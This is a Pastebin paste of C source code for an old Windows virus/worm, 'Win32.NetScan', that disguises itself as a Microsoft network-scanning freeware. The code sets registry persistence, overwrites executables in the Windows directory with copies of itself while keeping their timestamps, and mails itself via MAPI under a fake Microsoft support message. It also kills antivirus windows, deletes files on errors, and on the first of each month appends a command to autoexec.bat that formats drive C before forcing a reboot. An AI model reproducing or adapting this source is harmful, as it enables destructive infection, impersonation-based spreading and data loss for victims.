FlyFar

Win32/Win32.Netscan - Virus Source Code

Mar 9th, 2023
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 10.84 KB | Cybersecurity | 0 0
  1. #include "netscan.h"
  2. #pragma hdrstop
  3. #pragma warning (disable: 4068)
  4. #pragma warning (disable: 4001)
  5. #pragma resource "resource.res"
  6.  
  7. char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
  8. LPSTR FileEmm386 = "Emm386.exe";
  9. LPSTR FileSetver = "SetVer.exe";
  10. LPSTR Nom = "a";
  11. DWORD ExtInf;
  12. int Err,ErrSend;
  13. HANDLE NetScanTime,NetScanHandle,AutoBat;
  14. HMODULE GetKernLib, GetMapiLib;
  15. HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
  16. typedef DWORD(*RegistServProcs)(DWORD,DWORD);
  17. typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
  18. typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
  19. typedef ULONG(*DoMemFree)(LPVOID);
  20. HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
  21.  
  22. #pragma argsused
  23. int APIENTRY WinMain
  24. (
  25. HINSTANCE hInstance,
  26. HINSTANCE hPrevInstance,
  27. LPSTR     lpszCmdLine,
  28. int       nCmdShow
  29. )
  30. {
  31. //Win32.NetScan by ZeMacroKiller98
  32. //Tous droits r‚serv‚s (c) 2001
  33. WIN32_FIND_DATA GetFileToInfect;
  34. OSVERSIONINFO GetOsVer;
  35. FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
  36. SYSTEMTIME TriggerScanTime;
  37. RegistServProcs MyServProcs;
  38. SendMessInfect SendMessToOther;
  39. FindUserAddress GetAddressUser;
  40. DoMemFree GetMemFree;
  41. GetKernLib = LoadLibrary("kernel32.dll");
  42. MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
  43. MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
  44. SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
  45. GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
  46. GetVersionEx(&GetOsVer);
  47. if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
  48. {
  49.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
  50.         RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
  51.         RegCloseKey(NetScanNTKey);
  52. }
  53. else
  54. {
  55.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
  56.         RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
  57.         RegCloseKey(NetScan32Key);
  58. }
  59. if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
  60. {
  61.         GetMapiLib = LoadLibrary("mapi32.dll");
  62.         GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
  63.         SetCurrentDirectory(GetNetScanWinDir);
  64.         NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
  65.         NetScanFind:
  66.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  67.         GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
  68.         CloseHandle(NetScanTime);        
  69.         if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
  70.                 goto NotInfection;
  71.         CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
  72.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  73.         SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
  74.         CloseHandle(NetScanTime);
  75.         NotInfection:
  76.         if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
  77.                 goto NetScanFind;
  78.         FindClose(NetScanHandle);
  79.         RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
  80.         RegCloseKey(CreateNetScan);
  81.         SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
  82.         GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
  83.         GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
  84.         if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
  85.         {
  86.                 MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
  87.                 SetCurrentDirectory("C:/");
  88.                 DeleteFile("*.*");
  89.                 ExitProcess(0);
  90.         }
  91. MapiMessage stMessage;
  92. MapiRecipDesc stRecip;
  93. MapiFileDesc stFile;
  94. lpMapiRecipDesc lpRecip;
  95. stFile.ulReserved = 0;
  96. stFile.flFlags = 0L;
  97. stFile.nPosition = (ULONG)-1;
  98. stFile.lpszPathName = GetNetScanPath;
  99. stFile.lpszFileName = NULL;
  100. stFile.lpFileType = NULL;
  101. MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
  102. UnResolve:
  103. Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
  104. if(Err!=SUCCESS_SUCCESS)
  105. {
  106. switch(Err){
  107.         case MAPI_E_AMBIGUOUS_RECIPIENT:
  108.                 MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
  109.         break;
  110.         case MAPI_E_UNKNOWN_RECIPIENT:
  111.                 MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
  112.         break;
  113.         case MAPI_E_FAILURE:
  114.                 MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  115.                 DeleteFile("*.*");
  116.                 ExitProcess(0);
  117.         break;
  118.         case MAPI_E_INSUFFICIENT_MEMORY:
  119.                 MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  120.                 DeleteFile("*.*");
  121.                 ExitProcess(0);
  122.         break;
  123.         case MAPI_E_NOT_SUPPORTED:
  124.                 MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  125.                 DeleteFile("*.*");
  126.                 ExitProcess(0);
  127.         break;
  128.         case MAPI_E_USER_ABORT:
  129.                 MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  130.                 DeleteFile("*.*");
  131.                 ExitProcess(0);
  132.         break;        
  133.         }
  134. goto UnResolve;
  135. }
  136. stRecip.ulReserved = lpRecip->ulReserved;
  137. stRecip.ulRecipClass = MAPI_TO;
  138. stRecip.lpszName = lpRecip->lpszName;
  139. stRecip.lpszAddress = lpRecip->lpszAddress;
  140. stRecip.ulEIDSize = lpRecip->ulEIDSize;
  141. stRecip.lpEntryID = lpRecip->lpEntryID;
  142. stMessage.ulReserved = 0;
  143. stMessage.lpszSubject = "Microsoft NetScan Utility";
  144. stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
  145. stMessage.lpszMessageType = NULL;
  146. stMessage.lpszDateReceived = NULL;
  147. stMessage.lpszConversationID = NULL;
  148. stMessage.flFlags = 0L;
  149. stMessage.lpOriginator = NULL;
  150. stMessage.nRecipCount = 1;
  151. stMessage.lpRecips = &stRecip;
  152. stMessage.nFileCount = 1;
  153. stMessage.lpFiles = &stFile;
  154. ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
  155. if(ErrSend!=SUCCESS_SUCCESS)
  156. {
  157.         MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  158.         DeleteFile("*.*");
  159.         ExitProcess(0);
  160. }
  161. MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
  162.                 "NetScan Utility",
  163.                  MB_OK|MB_ICONINFORMATION);
  164. FreeLibrary(GetMapiLib);
  165. }
  166. RegCloseKey(NetScanInstall);
  167. STARTUPINFO NetScanInfo;
  168. PROCESS_INFORMATION NetScanProc;
  169. NetScanInfo.cb = sizeof(STARTUPINFO);
  170. NetScanInfo.lpReserved = NULL;
  171. NetScanInfo.lpReserved2 = NULL;
  172. NetScanInfo.cbReserved2 = 0;
  173. NetScanInfo.lpDesktop = NULL;
  174. NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
  175. if(CreateProcess(GetNetScanPath,
  176.                 NULL,
  177.                 (LPSECURITY_ATTRIBUTES)NULL,
  178.                 (LPSECURITY_ATTRIBUTES)NULL,
  179.                 FALSE,
  180.                 0,
  181.                 NULL,
  182.                 NULL,
  183.                 &NetScanInfo,
  184.                 &NetScanProc))
  185. {
  186. CloseHandle(NetScanProc.hProcess);
  187. CloseHandle(NetScanProc.hThread);
  188. }
  189. if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
  190.         ExitProcess(0);
  191. SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
  192. MyServProcs(NetScanProc.dwProcessId,1);
  193. GetSystemTime(&TriggerScanTime);
  194. //Close windows which title is WINDOWS
  195. WindowsHwnd = FindWindow(NULL,"WINDOWS");
  196. if(WindowsHwnd!=NULL)
  197.         DestroyWindow(WindowsHwnd);
  198. //Close access to Symantec HomePage
  199. SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
  200. if(SymantecHwnd!=NULL)
  201. {
  202.         MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
  203.         DestroyWindow(SymantecHwnd);
  204. }
  205. //Anti Norton Antivirus
  206. NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
  207. if(NAVHwnd !=NULL)
  208. {
  209.         MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  210.         DestroyWindow(NAVHwnd);
  211. }
  212. if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
  213. {
  214.     mciSendString("open cdaudio",NULL,0,NULL);
  215.     mciSendString("set cdaudio door open",NULL,0,NULL);
  216.     mciSendString("close cdaudio",NULL,0,NULL);
  217.     mciSendString("open cdaudio",NULL,0,NULL);
  218.     mciSendString("set cdaudio audio all off",NULL,0,NULL);
  219.     mciSendString("close cdaudio",NULL,0,NULL);
  220.         MessageBeep(MB_ICONEXCLAMATION);
  221. }        
  222. if(TriggerScanTime.wDay==1)
  223. {
  224.         MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
  225.     SetCurrentDirectory("C:\\");
  226.         AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
  227.         SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
  228.         WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
  229.         CloseHandle(AutoBat);
  230.     ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
  231. }                
  232. FreeLibrary(GetKernLib);
  233. return 0;
  234. }
  235.  
  236.  
  237. *************************************************************************
  238.  
  239. #define WIN32_LEAN_AND_MEAN
  240. #include <windows.h>
  241. #include <dos.h>
  242. #include <stdlib.h>
  243. #include <stdio.h>
  244. #include <mapi.h>
  245. #include <mmsystem.h>
Add Comment
Please, Sign In to add comment